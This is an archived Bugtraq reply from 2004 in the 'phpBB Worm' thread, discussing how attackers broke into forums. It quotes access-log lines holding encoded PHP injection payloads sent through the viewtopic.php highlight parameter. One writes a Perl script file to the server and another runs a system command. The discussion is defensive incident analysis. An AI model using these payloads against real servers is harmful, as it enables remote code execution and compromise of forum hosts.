Bugtraq mailing list archives

Re: phpBB Worm

From: Alexander Klimov <alserkli () inbox ru>
Date: Wed, 22 Dec 2004 17:21:22 +0200 (IST)

On Mon, 20 Dec 2004, Shannon Lee wrote:

After some investigation, we determined that the attacker had gained
access via phpbb in a series of crafted URL requests, like so:

64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
/viewtopic.php?p=9002&sid=f5
399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),ch
r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)
%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252
echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252ech
r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
OMITTED.com/


It seems that automated exploiting starts soon after disclosure of the
vulnerability:

62.221.209.145 - - [24/Nov/2004:14:09:05 +0200]
"GET /viewtopic.php?t=50674&highlight=
%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527
HTTP/1.1" 404 219

Interestingly, we do not use phpbb and in fact do not have viewtopic.php at all.

-- 
Regards,
ASK

Current thread:

phpBB Worm Shannon Lee (Dec 21)
- Re: phpBB Worm Raymond Dijkxhoorn (Dec 21)
  - Re: phpBB Worm Sebastian Wiesinger (Dec 22)
    - Re: phpBB Worm William Geoghegan (Dec 23)
  - Re: phpBB Worm Anders Henke (Dec 23)
- RE: phpBB Worm Paul Kurczaba (Dec 21)
- Re: phpBB Worm Alexander Klimov (Dec 22)
- <Possible follow-ups>
- Re: phpBB Worm ycw1bh302 (Dec 22)
  - Re: phpBB Worm Alvin Packard (Dec 23)
  - Re: phpBB Worm Anders Henke (Dec 23)
- RE: phpBB Worm Ofer Shezaf (Dec 23)
  - RE: phpBB Worm Chris Ess (Dec 25)
- Re: phpBB Worm steve (Dec 24)
  - Re: phpBB Worm Raymond Dijkxhoorn (Dec 24)
    - new phpBB worm affects 2.0.11 Herman Sheremetyev (Dec 25)
- Re: phpBB Worm Zeljko Brajdic (Dec 25)